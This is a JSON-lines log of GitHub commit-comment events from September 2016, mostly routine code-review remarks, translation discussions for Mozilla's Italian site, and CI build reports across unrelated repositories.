{"id":"4631609308","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19209742,"position":null,"line":null,"path":null,"commit_id":"56ad30d47e82ee8175583988f94bc8c4c90558fd","created_at":"2016-09-28T15:53:19Z","updated_at":"2016-09-28T15:53:19Z","body":"```\r\nNo because then when overriding is intended it'll generate an unsolicited warning.\r\n```\r\nSimple, give the option to turn off the warning in the annotation\r\n\r\n```\r\nConforming takes care of this, this is not a serious problem and only affects the IDE.\r\n```\r\nTime-wise, most testing is performed in the IDE as it'll always be slower than production so if we see big gains in the IDE production, by association, benefits as well. The time spent figuring out that its just a poorly wrote injector that only affects IDE mode is, in my opinion, not worth the hassle as blood or myself will most definitely forget this \"lesson\" and blow man hours wondering why the hell this is broke."}},"created_at":"2016-09-28T15:53:19Z"}
{"id":"4631609690","type":"CommitCommentEvent","actor":{"login":"PhilippeLeroux"},"repo":{"name":"PhilippeLeroux/plescripts"},"payload":{"comment":{"id":19209743,"position":null,"line":null,"path":null,"commit_id":"3909dd6a931a542e2cb324449bf54cf8dd9be5ac","created_at":"2016-09-28T15:53:22Z","updated_at":"2016-09-28T15:53:22Z","body":"Le message de commit est faux.\r\nchown fonctionne pas avec xargs (problème avec les ACLs) alors que -exec de find n'a aucun problème."}},"created_at":"2016-09-28T15:53:22Z"}
{"id":"4631611564","type":"CommitCommentEvent","actor":{"login":"lotto91"},"repo":{"name":"lotto91/jari"},"payload":{"comment":{"id":19209748,"position":4,"line":12,"path":"app/src/main/java/com/lotto91/gamecenter/MainActivity.java","commit_id":"874d903609168ae4273d08fc66ce04272a3c0231","created_at":"2016-09-28T15:53:40Z","updated_at":"2016-09-28T15:53:40Z","body":"comment"}},"created_at":"2016-09-28T15:53:40Z"}
{"id":"4631612229","type":"CommitCommentEvent","actor":{"login":"menshiyun"},"repo":{"name":"menshiyun/proxmark3"},"payload":{"comment":{"id":19209749,"position":null,"line":null,"path":null,"commit_id":"0eb774e816cb9a803cd5e205815603ac9358a24b","created_at":"2016-09-28T15:53:46Z","updated_at":"2016-09-28T15:53:46Z","body":"cmd_debug is not in use"}},"created_at":"2016-09-28T15:53:46Z"}
{"id":"4631614685","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209755,"position":22,"line":20,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:54:08Z","updated_at":"2016-09-28T15:54:08Z","body":"Salubre significa \"che fa bene alla salute\", non \"in salute\"."}},"created_at":"2016-09-28T15:54:08Z"}
{"id":"4631617184","type":"CommitCommentEvent","actor":{"login":"fellague"},"repo":{"name":"fellague/ConsultationManager"},"payload":{"comment":{"id":19209762,"position":null,"line":null,"path":null,"commit_id":"50b9f3dbf75d697de450f2e28f7bf89cb900edca","created_at":"2016-09-28T15:54:30Z","updated_at":"2016-09-28T15:54:30Z","body":"do you have a facebook, i need to talk to you and ask you some questions\n????\nmine is https://www.facebook.com/abdelhalim.fellaguechebra\n\n2016-09-28 16:26 GMT+01:00 birama <notifications@github.com>:\n\n> Great , I can help if I have more explanation.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/fellague/ConsultationManager/commit/50b9f3dbf75d697de450f2e28f7bf89cb900edca#commitcomment-19209294>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AKd3NkTdzRbtDzwU69XZOFeUzqW6kdI2ks5quocKgaJpZM4KIFBx>\n> .\n>\n"}},"created_at":"2016-09-28T15:54:30Z"}
{"id":"4631617491","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209764,"position":57,"line":48,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:54:32Z","updated_at":"2016-09-28T15:54:32Z","body":"Utilizzando il Web come piattaforma unica, realizziamo tecnologie aperte e innovative per consentire agli sviluppatori di lavorare liberi dalle restrizioni di ecosistemi chiusi o governati da dinamiche aziendali **e** creare esperienze web più veloci e sicure per noi tutti."}},"created_at":"2016-09-28T15:54:32Z"}
{"id":"4631618439","type":"CommitCommentEvent","actor":{"login":"Toflar"},"repo":{"name":"composer/composer"},"payload":{"comment":{"id":19209766,"position":null,"line":null,"path":null,"commit_id":"15d572da4c2488acc6956dcaa76157da0781f03a","created_at":"2016-09-28T15:54:41Z","updated_at":"2016-09-28T15:54:41Z","body":"Afaik I do get notifications on commits. You did see my comment somehow too, didn't you? :-) Thought it's better here. Anyway, I can open a regular issue but I'm not sure if I'm even right :-P"}},"created_at":"2016-09-28T15:54:41Z"}
{"id":"4631620731","type":"CommitCommentEvent","actor":{"login":"fatmcgav"},"repo":{"name":"jtopjian/terraform"},"payload":{"comment":{"id":19209779,"position":null,"line":null,"path":null,"commit_id":"0fe36b3f858aefc7d140726ddaba1d02212f1aa4","created_at":"2016-09-28T15:55:03Z","updated_at":"2016-09-28T15:55:03Z","body":"@jtopjian Can 'APIKey' be removed from config.go#L19 aswell then?"}},"created_at":"2016-09-28T15:55:03Z"}
{"id":"4631623499","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19209787,"position":null,"line":null,"path":null,"commit_id":"605e4929fda878fbf6f2f29150beecf436795f88","created_at":"2016-09-28T15:55:27Z","updated_at":"2016-09-28T15:55:27Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [tester le chargement du jeu : dataset](https://trello.com/c/CoBzqFbj/22-tester-le-chargement-du-jeu-dataset)"}},"created_at":"2016-09-28T15:55:27Z"}
{"id":"4631623947","type":"CommitCommentEvent","actor":{"login":"jgw96"},"repo":{"name":"driftyco/ionic2-app-base"},"payload":{"comment":{"id":19209788,"position":null,"line":null,"path":null,"commit_id":"23c0cc40d24d5c24049472656dc2eb171f50f00f","created_at":"2016-09-28T15:55:32Z","updated_at":"2016-09-28T15:55:32Z","body":"Hello! This is actually currently a bug and will be fixed right after the RC.0 release is complete. Thanks! To work around this you can simply copy the service worker file out of `assets/` and move it into the root of `www/`. Once you have done that simply update the path in the above service worker registration code in your index.html and you will be good to go!"}},"created_at":"2016-09-28T15:55:32Z"}
{"id":"4631626331","type":"CommitCommentEvent","actor":{"login":"rlanger"},"repo":{"name":"Brightspace/d2l-icons-ui"},"payload":{"comment":{"id":19209792,"position":5,"line":39,"path":"d2l-icon-button-shared-styles.html","commit_id":"5a08f117ab29ff1594740176763a3b3541e17565","created_at":"2016-09-28T15:55:52Z","updated_at":"2016-09-28T15:55:52Z","body":"I talked with a few different designers, and the general consensus seems to be 0.5.  Do you remember who was recommending 0.75 opacity? I'd like to talk with them and see if that decision is still current.\r\n\r\nFWIW, inactive / disabled states are not subject to WCAG colour contrast requirements, so it's up to us to decide what level of contrast (or lack of contrast) we're comfortable with."}},"created_at":"2016-09-28T15:55:52Z"}
{"id":"4631628639","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19209798,"position":null,"line":null,"path":null,"commit_id":"22a514eaf8e22598a8d2f3dae85718b786593929","created_at":"2016-09-28T15:56:12Z","updated_at":"2016-09-28T15:56:12Z","body":"For more background, see: \r\n\r\nThis change is necessary in order to make CORS work as documented: http://sailsjs.org/documentation/reference/configuration/sails-config-cors#?properties\r\n\r\nHowever, we may change this behavior in Sails v1.0 for clarity.  For more info, see: https://github.com/balderdashy/sails/commit/f80252f66edc0bf00cf6ed317d9a3e68b4e8d948#commitcomment-19204615"}},"created_at":"2016-09-28T15:56:12Z"}
{"id":"4631633096","type":"CommitCommentEvent","actor":{"login":"jgoog999"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":19209809,"position":null,"line":null,"path":null,"commit_id":"0c07b660b9d94ee8aa6901e8d6a483c12bedc6d7","created_at":"2016-09-28T15:56:53Z","updated_at":"2016-09-28T15:56:53Z","body":"@Lemongrass3110 why the update affects also pre-re?"}},"created_at":"2016-09-28T15:56:53Z"}
{"id":"4631633308","type":"CommitCommentEvent","actor":{"login":"kenhys"},"repo":{"name":"groonga/groonga"},"payload":{"comment":{"id":19209811,"position":null,"line":null,"path":null,"commit_id":"1062efafb5993b8294cd63174132c1cefda27eaf","created_at":"2016-09-28T15:56:55Z","updated_at":"2016-09-28T15:56:55Z","body":"Thanks!\r\nI've fixed to use NGX_PCRE."}},"created_at":"2016-09-28T15:56:55Z"}
{"id":"4631633816","type":"CommitCommentEvent","actor":{"login":"tista500"},"repo":{"name":"tista500/Adapta"},"payload":{"comment":{"id":19209812,"position":null,"line":null,"path":null,"commit_id":"16a8c04419f73872b0cc567ff7c0c609ee25f3d5","created_at":"2016-09-28T15:57:00Z","updated_at":"2016-09-28T15:57:00Z","body":"I've done refactoring: https://github.com/tista500/Adapta/commit/e0e0ee45c697306c854f25bc611e79a26b474f03 and https://github.com/tista500/Adapta/commit/6c096e43d14bde3fb94cf3dcd17513770149aa4e\r\n\r\nSo now I only have a thing as issue:\r\n> Window-manager ignores margins outside of button.titlebutton style-class, it means Metacity will ignore the headerbar geometry if theme designers employed margin property to define the height of headerbar node. On the other hand, Mutter is OK because we can set specific spacing factors into .ssd .titlebar style-class with padding property.\r\n\r\nBut it seems to be related to Mutter as well, let me know if I should file a report to Metacity at bugzilla... :)\r\n\r\nBest Regards."}},"created_at":"2016-09-28T15:57:00Z"}
{"id":"4631639670","type":"CommitCommentEvent","actor":{"login":"Vidigan"},"repo":{"name":"Vidigan/EDL"},"payload":{"comment":{"id":19209828,"position":null,"line":null,"path":null,"commit_id":"7c9f25beb1f55b567b59bde6acc32856cc58fecf","created_at":"2016-09-28T15:57:56Z","updated_at":"2016-09-28T15:57:56Z","body":"Poderia me dizer qual que poderia melhorar e também se puder, algum pdf falando sobre os binding times, porque eu fiz sem saber muita coisa a respeito<http://aka.ms/weboutlook>\n\n________________________________\nDe: fsantanna <notifications@github.com>\nEnviado: quarta-feira, 28 de setembro de 2016 12:31:21\nPara: Vidigan/EDL\nAssunto: Re: [Vidigan/EDL] Create main.lua (7c9f25b)\n\n\n4 dos 6 exemplos podem melhorar...\n\n-\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub<https://github.com/Vidigan/EDL/commit/7c9f25beb1f55b567b59bde6acc32856cc58fecf#commitcomment-19209393>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AIqdSjI6NHFAr4dKSqWPN2Em9qC_sUh9ks5quohJgaJpZM4KI-Gk>.\n"}},"created_at":"2016-09-28T15:57:56Z"}
{"id":"4631642586","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19209836,"position":null,"line":null,"path":null,"commit_id":"5bf588f92e207cee5a2bc7ef8c9f939d29c0188a","created_at":"2016-09-28T15:58:21Z","updated_at":"2016-09-28T15:58:21Z","body":"develop (axelstudios) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5bf588f92e207cee5a2bc7ef8c9f939d29c0188a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T15:58:21Z"}
{"id":"4631643059","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209840,"position":27,"line":24,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:58:25Z","updated_at":"2016-09-28T15:58:25Z","body":"Sì, meglio di tutto.\n\n\n"}},"created_at":"2016-09-28T15:58:25Z"}
{"id":"4631645059","type":"CommitCommentEvent","actor":{"login":"stof"},"repo":{"name":"composer/composer"},"payload":{"comment":{"id":19209844,"position":null,"line":null,"path":null,"commit_id":"15d572da4c2488acc6956dcaa76157da0781f03a","created_at":"2016-09-28T15:58:44Z","updated_at":"2016-09-28T15:58:44Z","body":"Well, I said that people *might have disabled them*, not that everyone does it (and I obviously have not disabled them, otherwise I would *never* have seen this comment, except by receiving a link to it elsewhere).\r\nAnd given that Niels is working on this project only from time to time (he is not the most active maintainer of the project by far), I strongly doubt he reads all notifications he receives about the project (as most of them would be totally outdated by the time he comes back)"}},"created_at":"2016-09-28T15:58:44Z"}
{"id":"4631647273","type":"CommitCommentEvent","actor":{"login":"kalyabin"},"repo":{"name":"dmirogin/backuper"},"payload":{"comment":{"id":19209849,"position":1,"line":1,"path":"src/bin/backuper","commit_id":"a7567e7a638f81639b98f2fe7dee05f907039753","created_at":"2016-09-28T15:59:04Z","updated_at":"2016-09-28T15:59:04Z","body":"Расположение php может быть везде (/usr/bin/php, /usr/local/bin/php и т.д.)\r\n\r\nДля первой строки лучше использовать `#!/usr/bin/env php`\r\n\r\n:)"}},"created_at":"2016-09-28T15:59:04Z"}
{"id":"4631649110","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209852,"position":null,"line":null,"path":null,"commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:59:21Z","updated_at":"2016-09-28T15:59:21Z","body":"> Lean Data ho provato a tradurlo con Big Data meno invasivi, non fosse altro che per il fatto che, Big Data è un termine usato anche in italiano.\r\nhttps://www.theguardian.com/media-network/media-network-blog/2013/apr/16/big-data-lean-strategy-business\r\n\r\nHo scritto sotto la riga in questione. Visto che è un termine che gioca sul contrasto con i Big Data, trovo che traducendolo si perde il riferimento. Spiegarlo con una parafrasi è macchinoso. Al tempo stesso, essendo un termine coniato di fresco e poco noto all'utente medio, mi sembra brutto lanciarlo così nella mischia. Io proporrei dunque inglese con virgolette, in modo che l'utente capisca che si tratta di un termine speciale, che fa riferimento ad altro."}},"created_at":"2016-09-28T15:59:21Z"}
{"id":"4631652583","type":"CommitCommentEvent","actor":{"login":"keeshui"},"repo":{"name":"keeshui/hello-world"},"payload":{"comment":{"id":19209858,"position":2,"line":2,"path":"README.md","commit_id":"9edc99a7efa48c3b81efaecd11597b97e00e7c2c","created_at":"2016-09-28T15:59:51Z","updated_at":"2016-09-28T15:59:51Z","body":"Italic word in branch 2 ?"}},"created_at":"2016-09-28T15:59:51Z"}
{"id":"4631653791","type":"CommitCommentEvent","actor":{"login":"yakiradixon"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19209860,"position":4,"line":248,"path":"otrv4.md","commit_id":"3a93618c6359cf86672307e49acfb12735882f67","created_at":"2016-09-28T16:00:03Z","updated_at":"2016-09-28T16:00:03Z","body":"Adding notes here from offline discussion We use the header keys to encrypt headers and to decrypt the headers of skipped-over messages. If we are not going to encrypt the headers or handle messages delivered out of order then we don't see a reason for having them."}},"created_at":"2016-09-28T16:00:03Z"}
{"id":"4631654267","type":"CommitCommentEvent","actor":{"login":"karesti"},"repo":{"name":"igoraresti/Messenger"},"payload":{"comment":{"id":19209861,"position":37,"line":33,"path":"src/main/java/org/iaresti/messenger/database/Database.java","commit_id":"107ebe44bc44e4aaf931517514af4c5a331d7a27","created_at":"2016-09-28T16:00:07Z","updated_at":"2016-09-28T16:00:07Z","body":"Return List no ArrayList (la interfaz)"}},"created_at":"2016-09-28T16:00:07Z"}
{"id":"4631655817","type":"CommitCommentEvent","actor":{"login":"Artoria2e5"},"repo":{"name":"syscl/Enable-HiDPI-OSX"},"payload":{"comment":{"id":19209864,"position":2,"line":399,"path":"enable-HiDPI.sh","commit_id":"132ac6ed8bd810c833f03fe1709059fd9a62909f","created_at":"2016-09-28T16:00:18Z","updated_at":"2016-09-28T16:00:18Z","body":"`function` is a bashism, and by using so you are assuming `/bin/sh` as bash (which is the case on macOS). With a `bash` assumption, you may use some more elegant constructs by switching to `/bin/bash`…"}},"created_at":"2016-09-28T16:00:18Z"}
{"id":"4631657304","type":"CommitCommentEvent","actor":{"login":"birama"},"repo":{"name":"fellague/ConsultationManager"},"payload":{"comment":{"id":19209867,"position":null,"line":null,"path":null,"commit_id":"50b9f3dbf75d697de450f2e28f7bf89cb900edca","created_at":"2016-09-28T16:00:30Z","updated_at":"2016-09-28T16:00:30Z","body":"Yea, I have added you on mine"}},"created_at":"2016-09-28T16:00:30Z"}
{"id":"4631660310","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19209871,"position":null,"line":null,"path":null,"commit_id":"5bf588f92e207cee5a2bc7ef8c9f939d29c0188a","created_at":"2016-09-28T16:00:56Z","updated_at":"2016-09-28T16:00:56Z","body":"develop (axelstudios) - x86_64-MacOS-10.10-clang: OK (2383 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5bf588f92e207cee5a2bc7ef8c9f939d29c0188a-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5bf588f92e207cee5a2bc7ef8c9f939d29c0188a-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.34%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T16:00:56Z"}
{"id":"4631660368","type":"CommitCommentEvent","actor":{"login":"mcsf"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19209872,"position":8,"line":16,"path":"client/plugins/hello-world/hello-world.js","commit_id":"df8a938e7a14c44c46894f9757f921bb6f888f86","created_at":"2016-09-28T16:00:57Z","updated_at":"2016-09-28T16:00:57Z","body":"Indeed, all valid alternatives, though the first one would be very limited if we want to restyle deep-nested components — question obviously is: do we need to? Probably."}},"created_at":"2016-09-28T16:00:57Z"}
{"id":"4631661148","type":"CommitCommentEvent","actor":{"login":"Artoria2e5"},"repo":{"name":"syscl/Enable-HiDPI-OSX"},"payload":{"comment":{"id":19209875,"position":14,"line":407,"path":"enable-HiDPI.sh","commit_id":"132ac6ed8bd810c833f03fe1709059fd9a62909f","created_at":"2016-09-28T16:01:04Z","updated_at":"2016-09-28T16:01:04Z","body":"`\"$i\"`"}},"created_at":"2016-09-28T16:01:04Z"}
{"id":"4631661155","type":"CommitCommentEvent","actor":{"login":"garyrussell"},"repo":{"name":"spring-projects/spring-amqp"},"payload":{"comment":{"id":19209876,"position":null,"line":null,"path":null,"commit_id":"64789942f988a2b88ba6ba4dd99e6600c69e45c7","created_at":"2016-09-28T16:01:04Z","updated_at":"2016-09-28T16:01:04Z","body":"Hehe - that's why I said \"backport\" not \"cherry-pick\" in PR 😄 "}},"created_at":"2016-09-28T16:01:04Z"}
{"id":"4631661780","type":"CommitCommentEvent","actor":{"login":"karesti"},"repo":{"name":"igoraresti/Messenger"},"payload":{"comment":{"id":19209878,"position":79,"line":74,"path":"src/main/java/org/iaresti/messenger/database/Database.java","commit_id":"107ebe44bc44e4aaf931517514af4c5a331d7a27","created_at":"2016-09-28T16:01:10Z","updated_at":"2016-09-28T16:01:10Z","body":"No exponer el Map"}},"created_at":"2016-09-28T16:01:10Z"}
{"id":"4631663880","type":"CommitCommentEvent","actor":{"login":"3raxton"},"repo":{"name":"3raxton/bluewave"},"payload":{"comment":{"id":19209880,"position":23,"line":23,"path":"bluwavform.html","commit_id":"9e5c6a865780d6474e3e542fa86d4c9f735e53a0","created_at":"2016-09-28T16:01:28Z","updated_at":"2016-09-28T16:01:28Z","body":"![bluwavlogo](https://cloud.githubusercontent.com/assets/20716142/18921560/e5641258-856a-11e6-8aed-e4a66638d69b.jpg)\r\n"}},"created_at":"2016-09-28T16:01:28Z"}
{"id":"4631664459","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19209881,"position":null,"line":null,"path":null,"commit_id":"0eb77e61d2e9a778c08e696d503a85e3e79ee155","created_at":"2016-09-28T16:01:33Z","updated_at":"2016-09-28T16:01:33Z","body":"What is your desire behind this suggestion? "}},"created_at":"2016-09-28T16:01:33Z"}
{"id":"4631666853","type":"CommitCommentEvent","actor":{"login":"karesti"},"repo":{"name":"igoraresti/Messenger"},"payload":{"comment":{"id":19209886,"position":13,"line":13,"path":"src/main/java/org/iaresti/messenger/database/Database.java","commit_id":"107ebe44bc44e4aaf931517514af4c5a331d7a27","created_at":"2016-09-28T16:01:55Z","updated_at":"2016-09-28T16:01:55Z","body":"Te faltaria usar un LOCK para evitar los accesos concurrentes ahora"}},"created_at":"2016-09-28T16:01:55Z"}
{"id":"4631668779","type":"CommitCommentEvent","actor":{"login":"kristoferB"},"repo":{"name":"kristoferB/SP"},"payload":{"comment":{"id":19209897,"position":null,"line":null,"path":null,"commit_id":"a6b2243e0939f872d3824fccbc6d3472d5cc12ad","created_at":"2016-09-28T16:02:13Z","updated_at":"2016-09-28T16:02:13Z","body":"The gui-folder also included the scala web-server that we need. But we can add that to another folder / sub-project instead if you would like the have the gui in a separate folder. I actually think that is good. "}},"created_at":"2016-09-28T16:02:13Z"}
{"id":"4631670771","type":"CommitCommentEvent","actor":{"login":"Toflar"},"repo":{"name":"composer/composer"},"payload":{"comment":{"id":19209902,"position":null,"line":null,"path":null,"commit_id":"15d572da4c2488acc6956dcaa76157da0781f03a","created_at":"2016-09-28T16:02:30Z","updated_at":"2016-09-28T16:02:30Z","body":"Ah, I see where you're coming from. I'll open a regular issue then. Thx for your feedback, Christophe!"}},"created_at":"2016-09-28T16:02:30Z"}
{"id":"4631670958","type":"CommitCommentEvent","actor":{"login":"edzer"},"repo":{"name":"pacificclimate/Rudunits2"},"payload":{"comment":{"id":19209903,"position":2,"line":1,"path":"R/ud.functions.R","commit_id":"298e789729cf8388203fcfe07a6870cfbad2eee3","created_at":"2016-09-28T16:02:32Z","updated_at":"2016-09-28T16:02:32Z","body":"I suggest to revert this back. Right now, `units` cannot load `udunits2` properly, because the xml database is only loaded when attaching it (under the scenario that it hasn't been set system-wide or pointed to by the env. variable). attaching packages is discouraged as it clobbers name space for users; loading is encouraged."}},"created_at":"2016-09-28T16:02:32Z"}
{"id":"4631674844","type":"CommitCommentEvent","actor":{"login":"karesti"},"repo":{"name":"igoraresti/Messenger"},"payload":{"comment":{"id":19209913,"position":16,"line":16,"path":"src/main/java/org/iaresti/messenger/database/Database.java","commit_id":"107ebe44bc44e4aaf931517514af4c5a331d7a27","created_at":"2016-09-28T16:03:11Z","updated_at":"2016-09-28T16:03:11Z","body":"Ahora solo te falta poner un LOCK por cada HashMap para evitar problemas de lectura /escritura concurretes.\r\nSeria un lock por hashmap porque no hay que bloquear las lecturas de mensajes si estamos leyendo los profiles."}},"created_at":"2016-09-28T16:03:11Z"}
{"id":"4631679578","type":"CommitCommentEvent","actor":{"login":"FlatOutPS2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19209929,"position":36,"line":620,"path":"pcsx2/ps2/pgif.cpp","commit_id":"fd58ee62890b8c7e468c92a16aa51728908da49d","created_at":"2016-09-28T16:03:57Z","updated_at":"2016-09-28T16:03:57Z","body":"`if ((addr != PGIF_CTRL)` followed by `if ((addr != PGIF_CTRL) || ...` ?\r\nWoulnd't it make more sense to condense this to one if instead of three?"}},"created_at":"2016-09-28T16:03:57Z"}
{"id":"4631679769","type":"CommitCommentEvent","actor":{"login":"karesti"},"repo":{"name":"igoraresti/Messenger"},"payload":{"comment":{"id":19209931,"position":13,"line":18,"path":"src/main/java/org/iaresti/messenger/service/MessageService.java","commit_id":"107ebe44bc44e4aaf931517514af4c5a331d7a27","created_at":"2016-09-28T16:03:59Z","updated_at":"2016-09-28T16:03:59Z","body":"Puedes quitar el constructor, no hace falta declararlo"}},"created_at":"2016-09-28T16:03:59Z"}
{"id":"4631682678","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Vidigan/EDL"},"payload":{"comment":{"id":19209938,"position":null,"line":null,"path":null,"commit_id":"7c9f25beb1f55b567b59bde6acc32856cc58fecf","created_at":"2016-09-28T16:04:26Z","updated_at":"2016-09-28T16:04:26Z","body":"No slide \"00\" da disciplina tem o nome do livro (que pode ser encontrado no\nGoogle).\nCaso tenha dúvida específica sobre algum deles pode me perguntar aqui ou na\naula.\n\n2016-09-28 12:57 GMT-03:00 Luca Ribeiro Pereira Carneiro <\nnotifications@github.com>:\n\n> Poderia me dizer qual que poderia melhorar e também se puder, algum pdf\n> falando sobre os binding times, porque eu fiz sem saber muita coisa a\n> respeito<http://aka.ms/weboutlook>\n>\n> ________________________________\n> De: fsantanna <notifications@github.com>\n> Enviado: quarta-feira, 28 de setembro de 2016 12:31:21\n> Para: Vidigan/EDL\n> Assunto: Re: [Vidigan/EDL] Create main.lua (7c9f25b)\n>\n>\n> 4 dos 6 exemplos podem melhorar...\n>\n> -\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub<https://github.com/\n> Vidigan/EDL/commit/7c9f25beb1f55b567b59bde6acc32856cc58fecf#commitcomment-\n> 19209393>, or mute the thread<https://github.com/\n> notifications/unsubscribe-auth/AIqdSjI6NHFAr4dKSqWPN2Em9qC_\n> sUh9ks5quohJgaJpZM4KI-Gk>.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Vidigan/EDL/commit/7c9f25beb1f55b567b59bde6acc32856cc58fecf#commitcomment-19209828>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AADcewBNauiIBw7us4Qd7aJ6ZcqV3Ewzks5quo6EgaJpZM4KI-Gk>\n> .\n>\n"}},"created_at":"2016-09-28T16:04:26Z"}
{"id":"4631683119","type":"CommitCommentEvent","actor":{"login":"albertsmuktupavels"},"repo":{"name":"tista500/Adapta"},"payload":{"comment":{"id":19209939,"position":null,"line":null,"path":null,"commit_id":"16a8c04419f73872b0cc567ff7c0c609ee25f3d5","created_at":"2016-09-28T16:04:31Z","updated_at":"2016-09-28T16:04:31Z","body":">\n> .default-decoration should not be ignored in metacity, is it?\n> Hopefully right. Adwaita stopped adding window-manager specific theming\n> already though, but we need.\n>\n> I'm sorry I was wrong. .default-decoration works as we expected as to be\n> set headerbar.titlebar.default-decoration. So the problem might be Adapta\n> specific... :(\n>\nJust remember that this is used also by mutter and real csd windows:\nhttps://git.gnome.org/browse/gtk+/tree/gtk/gtkwindow.c#n6038\n"}},"created_at":"2016-09-28T16:04:31Z"}
{"id":"4631689817","type":"CommitCommentEvent","actor":{"login":"Lemongrass3110"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":19209964,"position":null,"line":null,"path":null,"commit_id":"0c07b660b9d94ee8aa6901e8d6a483c12bedc6d7","created_at":"2016-09-28T16:05:27Z","updated_at":"2016-09-28T16:05:27Z","body":"Buyingstore never existed in pre-renewal. That's why we just updated it according to renewal with the items existing in pre-renewal."}},"created_at":"2016-09-28T16:05:27Z"}
{"id":"4631694106","type":"CommitCommentEvent","actor":{"login":"AleksCore"},"repo":{"name":"JarnoVgr/Mr.Green-MTA-Resources"},"payload":{"comment":{"id":19209970,"position":null,"line":null,"path":null,"commit_id":"5e412d5631afefe0e310651d073578f3ae4e633c","created_at":"2016-09-28T16:06:08Z","updated_at":"2016-09-28T16:06:08Z","body":"bc4ca4ea3fdbffb64d1e14d90b6d956ae5e9057e"}},"created_at":"2016-09-28T16:06:08Z"}
{"id":"4631695704","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19209973,"position":22,"line":20,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T16:06:22Z","updated_at":"2016-09-28T16:06:22Z","body":"Appunto, a me il concetto che un ecosistema sia \"sano\" suona male.\r\nGli esseri viventi sono sani. Il parametro con cui giudicherei un ecosistema non è sano o malato, ma al massimo adatto a garantire la salute dei suoi abitanti > salubre.\r\nSo che l'inglese lo dice nel senso che intendi tu, ma non so se è interamente appropriato come lo usano."}},"created_at":"2016-09-28T16:06:22Z"}
{"id":"4631699146","type":"CommitCommentEvent","actor":{"login":"Artoria2e5"},"repo":{"name":"syscl/Enable-HiDPI-OSX"},"payload":{"comment":{"id":19209982,"position":83,"line":182,"path":"enable-HiDPI.sh","commit_id":"14c50d3253f6e0d89226ee41392837a4624b5148","created_at":"2016-09-28T16:06:55Z","updated_at":"2016-09-28T16:06:55Z","body":"Bad `echo` nesting (`echo | tr` will do), missing quoting for `$1`. Actually try `printf %s \"${1,,}\"`."}},"created_at":"2016-09-28T16:06:55Z"}
{"id":"4631701765","type":"CommitCommentEvent","actor":{"login":"ChristianFeldmann"},"repo":{"name":"IENT/YUView"},"payload":{"comment":{"id":19209988,"position":null,"line":null,"path":null,"commit_id":"6d6b14e195aa32f992020a15967ce5375a72038a","created_at":"2016-09-28T16:07:21Z","updated_at":"2016-09-28T16:07:21Z","body":"I think this is wrong. In VS is generates C4129. What did you mean? Do you want to escape the . or do you want to detect backslashes?"}},"created_at":"2016-09-28T16:07:21Z"}
